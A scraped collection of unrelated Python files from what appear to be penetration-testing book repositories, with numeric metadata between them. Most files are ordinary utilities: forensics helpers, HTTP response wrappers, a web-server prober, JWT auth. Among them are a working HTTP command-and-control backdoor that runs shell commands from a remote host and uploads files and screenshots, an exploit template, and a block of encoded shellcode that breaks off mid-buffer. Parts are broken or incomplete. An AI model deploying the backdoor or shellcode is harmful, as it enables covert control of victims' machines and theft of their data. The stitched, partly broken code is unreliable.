@contact: holger@homac.de
"""
import volatility.obj as obj
import volatility.plugins.linux.flags as linux_flags
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.proc_maps as linux_proc_maps
import volatility.plugins.linux.dalvik_vms as dalvik_vms
import volatility.plugins.linux.dalvik as dalvik
import sys, traceback
class dalvik_loaded_classes(linux_common.AbstractLinuxCommand):
"""Gather informationen about loaded classes a specific DalvikVM
instance knows about"""
def __init__(self, config, *args, **kwargs):
linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
dalvik.register_option_GDVM_OFFSET(self._config)
dalvik.register_option_PID(self._config)
def calculate(self):
proc_maps = linux_proc_maps.linux_proc_maps(self._config).calculate()
dalvikVMs = dalvik_vms.dalvik_vms(self._config).calculate()
for task, gDvm in dalvikVMs:
for entry in gDvm.loadedClasses.dereference().get_entries():
clazz = obj.Object('ClassObject', offset = entry, vm = gDvm.loadedClasses.obj_vm)
yield task, clazz
def render_text(self, outfd, data):
self.table_header(outfd, [("PID", "5"),
("Offset", "10"),
("Descriptor", "70"),
("sourceFile", "30")])
for task, clazz in data:
if isinstance(clazz.obj_offset, int):
self.table_row(outfd,
task.pid,
hex(clazz.obj_offset),
dalvik.getString(clazz.descriptor),
dalvik.getString(clazz.sourceFile))
else:
self.table_row(outfd,
task.pid,
clazz.obj_offset,
dalvik.getString(clazz.descriptor),
dalvik.getString(clazz.sourceFile))
| 38.323529 | 97 | 0.662926 |
PenetrationTestingScripts | """Response classes.
The seek_wrapper code is not used if you're using UserAgent with
.set_seekable_responses(False), or if you're using the urllib2-level interface
HTTPEquivProcessor. Class closeable_response is instantiated by some handlers
(AbstractHTTPHandler), but the closeable_response interface is only depended
upon by Browser-level code. Function upgrade_response is only used if you're
using Browser.
Copyright 2006 John J. Lee <jjl@pobox.com>
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file COPYING.txt
included with the distribution).
"""
import copy, mimetools, urllib2
from cStringIO import StringIO
def len_of_seekable(file_):
# this function exists because evaluation of len(file_.getvalue()) on every
# .read() from seek_wrapper would be O(N**2) in number of .read()s
pos = file_.tell()
file_.seek(0, 2) # to end
try:
return file_.tell()
finally:
file_.seek(pos)
# XXX Andrew Dalke kindly sent me a similar class in response to my request on
# comp.lang.python, which I then proceeded to lose. I wrote this class
# instead, but I think he's released his code publicly since, could pinch the
# tests from it, at least...
# For testing seek_wrapper invariant (note that
# test_urllib2.HandlerTest.test_seekable is expected to fail when this
# invariant checking is turned on). The invariant checking is done by module
# ipdc, which is available here:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/436834
## from ipdbc import ContractBase
## class seek_wrapper(ContractBase):
class seek_wrapper:
"""Adds a seek method to a file object.
This is only designed for seeking on readonly file-like objects.
Wrapped file-like object must have a read method. The readline method is
only supported if that method is present on the wrapped object. The
readlines method is always supported. xreadlines and iteration are
supported only for Python 2.2 and above.
Public attributes:
wrapped: the wrapped file object
is_closed: true iff .close() has been called
WARNING: All other attributes of the wrapped object (ie. those that are not
one of wrapped, read, readline, readlines, xreadlines, __iter__ and next)
are passed through unaltered, which may or may not make sense for your
particular file object.
"""
# General strategy is to check that cache is full enough, then delegate to
# the cache (self.__cache, which is a cStringIO.StringIO instance). A seek
# position (self.__pos) is maintained independently of the cache, in order
# that a single cache may be shared between multiple seek_wrapper objects.
# Copying using module copy shares the cache in this way.
def __init__(self, wrapped):
self.wrapped = wrapped
self.__read_complete_state = [False]
self.__is_closed_state = [False]
self.__have_readline = hasattr(self.wrapped, "readline")
self.__cache = StringIO()
self.__pos = 0 # seek position
def invariant(self):
# The end of the cache is always at the same place as the end of the
# wrapped file (though the .tell() method is not required to be present
# on wrapped file).
return self.wrapped.tell() == len(self.__cache.getvalue())
def close(self):
self.wrapped.close()
self.is_closed = True
def __getattr__(self, name):
if name == "is_closed":
return self.__is_closed_state[0]
elif name == "read_complete":
return self.__read_complete_state[0]
wrapped = self.__dict__.get("wrapped")
if wrapped:
return getattr(wrapped, name)
return getattr(self.__class__, name)
def __setattr__(self, name, value):
if name == "is_closed":
self.__is_closed_state[0] = bool(value)
elif name == "read_complete":
if not self.is_closed:
self.__read_complete_state[0] = bool(value)
else:
self.__dict__[name] = value
def seek(self, offset, whence=0):
assert whence in [0,1,2]
# how much data, if any, do we need to read?
if whence == 2: # 2: relative to end of *wrapped* file
if offset < 0: raise ValueError("negative seek offset")
# since we don't know yet where the end of that file is, we must
# read everything
to_read = None
else:
if whence == 0: # 0: absolute
if offset < 0: raise ValueError("negative seek offset")
dest = offset
else: # 1: relative to current position
pos = self.__pos
if pos < offset:
raise ValueError("seek to before start of file")
dest = pos + offset
end = len_of_seekable(self.__cache)
to_read = dest - end
if to_read < 0:
to_read = 0
if to_read != 0:
self.__cache.seek(0, 2)
if to_read is None:
assert whence == 2
self.__cache.write(self.wrapped.read())
self.read_complete = True
self.__pos = self.__cache.tell() - offset
else:
data = self.wrapped.read(to_read)
if not data:
self.read_complete = True
else:
self.__cache.write(data)
# Don't raise an exception even if we've seek()ed past the end
# of .wrapped, since fseek() doesn't complain in that case.
# Also like fseek(), pretend we have seek()ed past the end,
# i.e. not:
#self.__pos = self.__cache.tell()
# but rather:
self.__pos = dest
else:
self.__pos = dest
def tell(self):
return self.__pos
def __copy__(self):
cpy = self.__class__(self.wrapped)
cpy.__cache = self.__cache
cpy.__read_complete_state = self.__read_complete_state
cpy.__is_closed_state = self.__is_closed_state
return cpy
def get_data(self):
pos = self.__pos
try:
self.seek(0)
return self.read(-1)
finally:
self.__pos = pos
def read(self, size=-1):
pos = self.__pos
end = len_of_seekable(self.__cache)
available = end - pos
# enough data already cached?
if size <= available and size != -1:
self.__cache.seek(pos)
self.__pos = pos+size
return self.__cache.read(size)
# no, so read sufficient data from wrapped file and cache it
self.__cache.seek(0, 2)
if size == -1:
self.__cache.write(self.wrapped.read())
self.read_complete = True
else:
to_read = size - available
assert to_read > 0
data = self.wrapped.read(to_read)
if not data:
self.read_complete = True
else:
self.__cache.write(data)
self.__cache.seek(pos)
data = self.__cache.read(size)
self.__pos = self.__cache.tell()
assert self.__pos == pos + len(data)
return data
def readline(self, size=-1):
if not self.__have_readline:
raise NotImplementedError("no readline method on wrapped object")
# line we're about to read might not be complete in the cache, so
# read another line first
pos = self.__pos
self.__cache.seek(0, 2)
data = self.wrapped.readline()
if not data:
self.read_complete = True
else:
self.__cache.write(data)
self.__cache.seek(pos)
data = self.__cache.readline()
if size != -1:
r = data[:size]
self.__pos = pos+size
else:
r = data
self.__pos = pos+len(data)
return r
def readlines(self, sizehint=-1):
pos = self.__pos
self.__cache.seek(0, 2)
self.__cache.write(self.wrapped.read())
self.read_complete = True
self.__cache.seek(pos)
data = self.__cache.readlines(sizehint)
self.__pos = self.__cache.tell()
return data
def __iter__(self): return self
def next(self):
line = self.readline()
if line == "": raise StopIteration
return line
xreadlines = __iter__
def __repr__(self):
return ("<%s at %s whose wrapped object = %r>" %
(self.__class__.__name__, hex(abs(id(self))), self.wrapped))
class response_seek_wrapper(seek_wrapper):
"""
Supports copying response objects and setting response body data.
"""
def __init__(self, wrapped):
seek_wrapper.__init__(self, wrapped)
self._headers = self.wrapped.info()
def __copy__(self):
cpy = seek_wrapper.__copy__(self)
# copy headers from delegate
cpy._headers = copy.copy(self.info())
return cpy
# Note that .info() and .geturl() (the only two urllib2 response methods
# that are not implemented by seek_wrapper) must be here explicitly rather
# than by seek_wrapper's __getattr__ delegation) so that the nasty
# dynamically-created HTTPError classes in get_seek_wrapper_class() get the
# wrapped object's implementation, and not HTTPError's.
def info(self):
return self._headers
def geturl(self):
return self.wrapped.geturl()
def set_data(self, data):
self.seek(0)
self.read()
self.close()
cache = self._seek_wrapper__cache = StringIO()
cache.write(data)
self.seek(0)
class eoffile:
# file-like object that always claims to be at end-of-file...
def read(self, size=-1): return ""
def readline(self, size=-1): return ""
def __iter__(self): return self
def next(self): return ""
def close(self): pass
class eofresponse(eoffile):
def __init__(self, url, headers, code, msg):
self._url = url
self._headers = headers
self.code = code
self.msg = msg
def geturl(self): return self._url
def info(self): return self._headers
class closeable_response:
"""Avoids unnecessarily clobbering urllib.addinfourl methods on .close().
Only supports responses returned by mechanize.HTTPHandler.
After .close(), the following methods are supported:
.read()
.readline()
.info()
.geturl()
.__iter__()
.next()
.close()
and the following attributes are supported:
.code
.msg
Also supports pickling (but the stdlib currently does something to prevent
it: http://python.org/sf/1144636).
"""
# presence of this attr indicates is useable after .close()
closeable_response = None
def __init__(self, fp, headers, url, code, msg):
self._set_fp(fp)
self._headers = headers
self._url = url
self.code = code
self.msg = msg
def _set_fp(self, fp):
self.fp = fp
self.read = self.fp.read
self.readline = self.fp.readline
if hasattr(self.fp, "readlines"): self.readlines = self.fp.readlines
if hasattr(self.fp, "fileno"):
self.fileno = self.fp.fileno
else:
self.fileno = lambda: None
self.__iter__ = self.fp.__iter__
self.next = self.fp.next
def __repr__(self):
return '<%s at %s whose fp = %r>' % (
self.__class__.__name__, hex(abs(id(self))), self.fp)
def info(self):
return self._headers
def geturl(self):
return self._url
def close(self):
wrapped = self.fp
wrapped.close()
new_wrapped = eofresponse(
self._url, self._headers, self.code, self.msg)
self._set_fp(new_wrapped)
def __getstate__(self):
# There are three obvious options here:
# 1. truncate
# 2. read to end
# 3. close socket, pickle state including read position, then open
# again on unpickle and use Range header
# XXXX um, 4. refuse to pickle unless .close()d. This is better,
# actually ("errors should never pass silently"). Pickling doesn't
# work anyway ATM, because of http://python.org/sf/1144636 so fix
# this later
# 2 breaks pickle protocol, because one expects the original object
# to be left unscathed by pickling. 3 is too complicated and
# surprising (and too much work ;-) to happen in a sane __getstate__.
# So we do 1.
state = self.__dict__.copy()
new_wrapped = eofresponse(
self._url, self._headers, self.code, self.msg)
state["wrapped"] = new_wrapped
return state
def test_response(data='test data', headers=[],
url="http://example.com/", code=200, msg="OK"):
return make_response(data, headers, url, code, msg)
def test_html_response(data='test data', headers=[],
url="http://example.com/", code=200, msg="OK"):
headers += [("Content-type", "text/html")]
return make_response(data, headers, url, code, msg)
def make_response(data, headers, url, code, msg):
"""Convenient factory for objects implementing response interface.
data: string containing response body data
headers: sequence of (name, value) pairs
url: URL of response
code: integer response code (e.g. 200)
msg: string response code message (e.g. "OK")
"""
mime_headers = make_headers(headers)
r = closeable_response(StringIO(data), mime_headers, url, code, msg)
return response_seek_wrapper(r)
def make_headers(headers):
"""
headers: sequence of (name, value) pairs
"""
hdr_text = []
for name_value in headers:
hdr_text.append("%s: %s" % name_value)
return mimetools.Message(StringIO("\n".join(hdr_text)))
# Rest of this module is especially horrible, but needed, at least until fork
# urllib2. Even then, may want to preseve urllib2 compatibility.
def get_seek_wrapper_class(response):
# in order to wrap response objects that are also exceptions, we must
# dynamically subclass the exception :-(((
if (isinstance(response, urllib2.HTTPError) and
not hasattr(response, "seek")):
if response.__class__.__module__ == "__builtin__":
exc_class_name = response.__class__.__name__
else:
exc_class_name = "%s.%s" % (
response.__class__.__module__, response.__class__.__name__)
class httperror_seek_wrapper(response_seek_wrapper, response.__class__):
# this only derives from HTTPError in order to be a subclass --
# the HTTPError behaviour comes from delegation
_exc_class_name = exc_class_name
def __init__(self, wrapped):
response_seek_wrapper.__init__(self, wrapped)
# be compatible with undocumented HTTPError attributes :-(
self.hdrs = wrapped.info()
self.filename = wrapped.geturl()
def __repr__(self):
return (
"<%s (%s instance) at %s "
"whose wrapped object = %r>" % (
self.__class__.__name__, self._exc_class_name,
hex(abs(id(self))), self.wrapped)
)
wrapper_class = httperror_seek_wrapper
else:
wrapper_class = response_seek_wrapper
return wrapper_class
def seek_wrapped_response(response):
"""Return a copy of response that supports seekable response interface.
Accepts responses from both mechanize and urllib2 handlers.
Copes with both ordinary response instances and HTTPError instances (which
can't be simply wrapped due to the requirement of preserving the exception
base class).
"""
if not hasattr(response, "seek"):
wrapper_class = get_seek_wrapper_class(response)
response = wrapper_class(response)
assert hasattr(response, "get_data")
return response
def upgrade_response(response):
"""Return a copy of response that supports Browser response interface.
Browser response interface is that of "seekable responses"
(response_seek_wrapper), plus the requirement that responses must be
useable after .close() (closeable_response).
Accepts responses from both mechanize and urllib2 handlers.
Copes with both ordinary response instances and HTTPError instances (which
can't be simply wrapped due to the requirement of preserving the exception
base class).
"""
wrapper_class = get_seek_wrapper_class(response)
if hasattr(response, "closeable_response"):
if not hasattr(response, "seek"):
response = wrapper_class(response)
assert hasattr(response, "get_data")
return copy.copy(response)
# a urllib2 handler constructed the response, i.e. the response is an
# urllib.addinfourl or a urllib2.HTTPError, instead of a
# _Util.closeable_response as returned by e.g. mechanize.HTTPHandler
try:
code = response.code
except AttributeError:
code = None
try:
msg = response.msg
except AttributeError:
msg = None
# may have already-.read() data from .seek() cache
data = None
get_data = getattr(response, "get_data", None)
if get_data:
data = get_data()
response = closeable_response(
response.fp, response.info(), response.geturl(), code, msg)
response = wrapper_class(response)
if data:
response.set_data(data)
return response
| 32.847909 | 80 | 0.598101 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/python
string = "TaPoGeTaBiGePoHfTmGeYbAtPtHoPoTaAuPtGeAuYbGeBiHoTaTmPtHoTmGePoAuGeErTaBiHoAuRnTmPbGePoHfTmGeTmRaTaBiPoTmPtHoTmGeAuYbGeTbGeLuTmPtTmPbTbOsGePbTmTaLuPtGeAuYbGeAuPbErTmPbGeTaPtGePtTbPoAtPbTmGeTbPtErGePoAuGeYbTaPtErGePoHfTmGeHoTbAtBiTmBiGeLuAuRnTmPbPtTaPtLuGePoHfTaBiGeAuPbErTmPbPdGeTbPtErGePoHfTaBiGePbTmYbTmPbBiGeTaPtGeTmTlAtTbOsGeIrTmTbBiAtPbTmGePoAuGePoHfTmGePbTmOsTbPoTaAuPtBiGeAuYbGeIrTbPtGeRhGeBiAuHoTaTbOsGeTbPtErGeHgAuOsTaPoTaHoTbOsGeRhGeTbPtErGePoAuGePoHfTmGeTmPtPoTaPbTmGeAtPtTaRnTmPbBiTmGeTbBiGeTbGeFrHfAuOsTmPd"
n=2
list = []
answer = []
[list.append(string[i:i+n]) for i in range(0, len(string), n)]
print set(list)
periodic ={"Pb": 82, "Tl": 81, "Tb": 65, "Ta": 73, "Po": 84, "Ge": 32, "Bi": 83, "Hf": 72, "Tm": 69, "Yb": 70, "At": 85, "Pt": 78, "Ho": 67, "Au": 79, "Er": 68, "Rn": 86, "Ra": 88, "Lu": 71, "Os": 76, "Tl": 81, "Pd": 46, "Rh": 45, "Fr": 87, "Hg": 80, "Ir": 77}
for value in list:
if value in periodic:
answer.append(chr(periodic[value]))
lastanswer = ''.join(answer)
print lastanswer
#it is the function of science to discover the existence of a general reign of order in nature and to find the causes governing this order and this refers in equal measure to the relations of man - social and political - and to the entire universe as a whole.
| 61.857143 | 529 | 0.764973 |
cybersecurity-penetration-testing | import binascii
import logging
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
def checkHeader(filename, headers, size):
"""
The checkHeader function reads a supplied size of the file and checks against known signatures to determine
the file type.
:param filename: The name of the file.
:param headers: A list of known file signatures for the file type(s).
:param size: The amount of data to read from the file for signature verification.
:return: Boolean, True if the signatures match; otherwise, False.
"""
with open(filename, 'rb') as infile:
header = infile.read(size)
hex_header = binascii.hexlify(header)
for signature in headers:
if hex_header == signature:
return True
else:
pass
logging.warn('The signature for {} ({}) does not match known signatures: {}'.format(
filename, hex_header, headers))
return False
def convertSize(size):
"""
The convertSize function converts an integer representing bytes into a human-readable format.
:param size: The size in bytes of a file
:return: The human-readable size.
"""
sizes = ['Bytes', 'KB', 'MB', 'GB', 'TB']
index = 0
while size > 1024:
size /= 1024.
index += 1
return '{:.2f} {}'.format(size, sizes[index])
| 32.309524 | 111 | 0.625179 |
Effective-Python-Penetration-Testing | import os,sys
from PIL import Image
from PIL.ExifTags import TAGS
for (i,j) in Image.open('image.jpg')._getexif().iteritems():
print '%s = %s' % (TAGS.get(i), j)
| 23.571429 | 60 | 0.643275 |
Python-for-Offensive-PenTest | '''
Installing Pillow
C:\Users\hkhrais>pip install Pillow
'''
# Python For Offensive PenTest
# Screen Capturing
import requests
import subprocess
import os
import time
from PIL import ImageGrab # Used to Grab a screenshot
import tempfile # Used to Create a temp directory
import shutil # Used to Remove the temp directory
while True:
req = requests.get('http://10.10.10.100')
command = req.text
if 'terminate' in command:
break
elif 'grab' in command:
grab,path=command.split('*')
if os.path.exists(path):
url = 'http://10.10.10.100/store'
files = {'file': open(path, 'rb')}
r = requests.post(url, files=files)
else:
post_response = requests.post(url='http://10.10.10.100', data='[-] Not able to find the file !' )
elif 'screencap' in command: #If we got a screencap keyword, then ..
dirpath = tempfile.mkdtemp() #Create a temp dir to store our screenshot file
ImageGrab.grab().save(dirpath + "\img.jpg", "JPEG") #Save the screencap in the temp dir
url = 'http://10.10.10.100/store'
files = {'file': open(dirpath + "\img.jpg", 'rb')}
r = requests.post(url, files=files) #Transfer the file over our HTTP
files['file'].close() #Once the file gets transfered, close the file.
shutil.rmtree(dirpath) #Remove the entire temp dir
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
post_response = requests.post(url='http://10.10.10.100', data=CMD.stdout.read() )
post_response = requests.post(url='http://10.10.10.100', data=CMD.stderr.read() )
time.sleep(3)
| 26.25 | 123 | 0.597192 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-07 23:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nmaper', '0004_nmapscan_status_text'),
]
operations = [
migrations.AddField(
model_name='nmapprofile',
name='profilename_text',
field=models.CharField(default='Default', max_length=32),
preserve_default=False,
),
]
| 22.636364 | 69 | 0.60501 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Name: wrapper_exploit.py
Purpose: An sample exploit for wrapping around a binary execution
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys, socket, strut, subprocess
program_name = 'C:\exploit_writing\vulnerable.exe'
fill ="A"*####
eip = struct.pack('<I',0x########)
offset = "\x90"*##
available_shellcode_space = ###
shell =() #Code to insert
# NOPs to fill the remaining space
exploit = fill + eip + offset + shell
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(exploit, (rhost, rport))
subprocess.call([program_name, exploit])
| 48.902439 | 89 | 0.780929 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: June 2015
Name: multi_threaded.py
Purpose: To identify live web applications with a list of IP addresses, using concurrent threads
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import urllib2, argparse, sys, threading, logging, Queue, time
queue = Queue.Queue()
lock = threading.Lock()
class Agent(threading.Thread):
def __init__(self, queue, logger, verbose):
threading.Thread.__init__(self)
self.queue = queue
self.logger = logger
self.verbose = verbose
def run(self):
while True:
host = self.queue.get()
print("[*] Testing %s") % (str(host))
target = "http://" + host
target_secure = "https://" + host
try:
request = urllib2.Request(target)
request.get_method = lambda : 'HEAD'
response = urllib2.urlopen(request)
except:
with lock:
self.logger.debug("[-] No web server at %s reported by thread %s" % (str(target), str(threading.current_thread().name)))
print("[-] No web server at %s reported by thread %s") % (str(target), str(threading.current_thread().name))
response = None
if response != None:
with lock:
self.logger.debug("[+] Response from %s reported by thread %s" % (str(target), str(threading.current_thread().name)))
print("[*] Response from insecure service on %s reported by thread %s") % (str(target), str(threading.current_thread().name))
self.logger.debug(response.info())
try:
target_secure = urllib2.urlopen(target_secure)
request_secure.get_method = lambda : 'HEAD'
response_secure = urllib2.urlopen(request_secure)
except:
with lock:
self.logger.debug("[-] No secure web server at %s reported by thread %s" % (str(target_secure), str(threading.current_thread().name)))
print("[-] No secure web server at %s reported by thread %s") % (str(target_secure), str(threading.current_thread().name))
response_secure = None
if response_secure != None:
with lock:
self.logger.debug("[+] Secure web server at %s reported by thread %s" % (str(target_secure), str(threading.current_thread().name)))
print("[*] Response from secure service on %s reported by thread %s") % (str(target_secure), str(threading.current_thread().name))
self.logger.debug(response_secure.info())
# Execution is complete
self.queue.task_done()
def main():
# If script is executed at the CLI
usage = '''usage: %(prog)s [-t hostfile] [-m threads] [-f filename] [-l logfile.log] [-m 2] -q -v -vv -vvv'''
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-t", action="store", dest="targets", default=None, help="Filename for hosts to test")
parser.add_argument("-f", "--filename", type=str, action="store", dest="filename", default="xml_output", help="The filename that will be used to create an XLSX")
parser.add_argument("-m", "--multi", action="store", dest="threads", default=1, type=int, help="Number of threads, defaults to 1")
parser.add_argument("-l", "--logfile", action="store", dest="log", default="results.log", type=str, help="The log file to output the results")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
args = parser.parse_args()
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if (args.targets == None):
parser.print_help()
sys.exit(1)
# Set Constructors
targets = args.targets # Targets to be parsed
verbose = args.verbose # Verbosity level
threads = args.threads # Threads to be used
log = args.log # Configure the log output file
if ".log" not in log:
log = log + ".log"
level = logging.DEBUG # Logging level
format = logging.Formatter("%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s") # Log format
logger_obj = logging.getLogger() # Getter for logging agent
file_handler = logging.FileHandler(args.log) # File Handler
#stderr_handler = logging.StreamHandler() # STDERR Handler
targets_list = []
# Configure logger formats for STDERR and output file
file_handler.setFormatter(format)
#stderr_handler.setFormatter(format)
# Configure logger object
logger_obj.addHandler(file_handler)
#logger_obj.addHandler(stderr_handler)
logger_obj.setLevel(level)
# Load the targets into a list and remove trailing "\n"
with open(targets) as f:
targets_list = [line.rstrip() for line in f.readlines()]
# Spawn workers to access site
for thread in range(0, threads):
worker = Agent(queue, logger_obj, verbose)
worker.setDaemon(True)
worker.start()
# Build queue of work
for target in targets_list:
queue.put(target)
# Wait for the queue to finish processing
queue.join()
if __name__ == '__main__':
main()
| 51.992958 | 165 | 0.604466 |
owtf | """
JSON Web Token auth for Tornado
"""
from sqlalchemy.sql.functions import user
from owtf.models.user_login_token import UserLoginToken
import jwt
from owtf.settings import JWT_SECRET_KEY, JWT_OPTIONS
from owtf.db.session import Session
def jwtauth(handler_class):
"""Decorator to handle Tornado JWT Authentication"""
def wrap_execute(handler_execute):
def require_auth(handler, kwargs):
auth = handler.request.headers.get("Authorization")
if auth:
parts = auth.split()
if parts[0].lower() != "bearer" or len(parts) == 1 or len(parts) > 2:
handler._transforms = []
handler.set_status(401)
handler.write({"success": False, "message": "Invalid header authorization"})
handler.finish()
token = parts[1]
try:
payload = jwt.decode(token, JWT_SECRET_KEY, options=JWT_OPTIONS)
user_id = payload.get("user_id", None)
session = Session()
user_token = UserLoginToken.find_by_userid_and_token(session, user_id, token)
if user_id is None or user_token is None:
handler._transforms = []
handler.set_status(401)
handler.write({"success": False, "message": "Unauthorized"})
handler.finish()
except Exception:
handler._transforms = []
handler.set_status(401)
handler.write({"success": False, "message": "Unauthorized"})
handler.finish()
else:
handler._transforms = []
handler.write({"success": False, "message": "Missing authorization"})
handler.finish()
return True
def _execute(self, transforms, *args, **kwargs):
try:
require_auth(self, kwargs)
except Exception:
return False
return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
| 34.625 | 97 | 0.534006 |
Python-Penetration-Testing-for-Developers | import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "192.168.0.1"
port =12345
s.connect((host,port))
print s.recv(1024)
s.send("Hello Server")
s.close() | 18.666667 | 53 | 0.715909 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
from pprint import pprint
network = IP(dst = '192.168.1.1')
transport = ICMP()
packet = network/transport
send(packet)
| 17.125 | 33 | 0.729167 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.6
from abc import ABC, abstractmethod
class QueueAbs(ABC):
def __init__(self):
self.buffer=[]
def printItems(self):
for item in self.buffer:
print(item)
@abstractmethod
def enqueue(self,item):
pass
@abstractmethod
def dequeue(self):
pass
class Queue(QueueAbs):
def __init__(self,length):
super().__init__()
self.length=length
def enqueue(self,item):
is_full=self.length <= len(self.buffer)
if is_full:
print("Queue is full")
return
self.buffer.append(item)
def dequeue(self):
if len(self.buffer) == 0:
print("Empty Queue")
return
item=self.buffer[0]
del self.buffer[0]
return item
class Driver():
def main(self):
q=Queue(10)
print("Enqueing")
for item in range(0,10):
q.enqueue(item)
print("Printing")
q.printItems()
print("Dequeing")
for item in range(0,10):
item=q.dequeue()
print(item)
d=Driver()
d.main()
| 13.640625 | 41 | 0.641026 |
Hands-On-Penetration-Testing-with-Python | import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buf = ""
buf += "\x99\x98\xf5\x41\x48\x9f\x2f\xfc\x9f\xf8\x48\x31\xc9"
buf += "\x48\x81\xe9\xd7\xff\xff\xff\x48\x8d\x05\xef\xff\xff"
buf += "\xff\x48\xbb\xb2\xa2\x05\x72\xca\x9c\x6b\xde\x48\x31"
buf += "\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x4e\x4a\x87"
buf += "\x72\xca\x9c\x0b\x57\x57\x93\xc5\x16\x41\xcc\x5b\x55"
buf += "\xe0\xae\x8e\x20\xde\x17\x19\xf6\xbd\x15\x4f\x54\xfb"
buf += "\x63\xc7\xe2\xd3\xde\x07\x5e\xea\x5d\xa4\xd3\xb3\x65"
buf += "\xe7\x80\x98\xcb\xe0\x8c\xa2\x29\x4f\x4e\x41\xd0\x7a"
buf += "\xa6\x51\xea\x04\xa3\x9b\x17\x32\xfe\xb3\x71\x8e\x3b"
buf += "\xd2\x7f\x51\x97\x39\x96\x8e\x73\x1c\xad\x94\x72\x73"
buf += "\x6d\x08\x73\x0d\xa4\x8b\xab\x44\xa1\x78\x8a\xf1\xe1"
buf += "\x4f\xab\x56\xfa\x8e\x2a\xee\x9d\xb8\xb8\x39\xae\x4e"
buf += "\xf9\x92\x80\x6a\x0d\x39\xa6\x8e\x73\x1a\x15\x2f\xfa"
buf += "\x96\xf9\x5e\x13\x93\xc6\x3a\x21\x52\xfd\x5a\x28\x41"
buf += "\x8e\x80\x53\xef\xca\x36\x40\xca\x9c\x03\xa9\xc1\x90"
buf += "\x5a\x26\xa2\xd0\x1c\xf8\xb5\x5d\xd0\xca\x5a\x9d\x6b"
buf += "\xde\x9b\x66\x51\x22\xa2\xb5\xeb\xb5\xb2\x5d\xd0\x22"
buf += "\x9a\xcc\x3b\x9e\xe2\xe2\x55\x1a\x20\x93\xb4\x3e\x4d"
buf += "\x77\x92\x18\xcf\xf4\xab\x76\x48\x3f\x6d\x70\xca\x99"
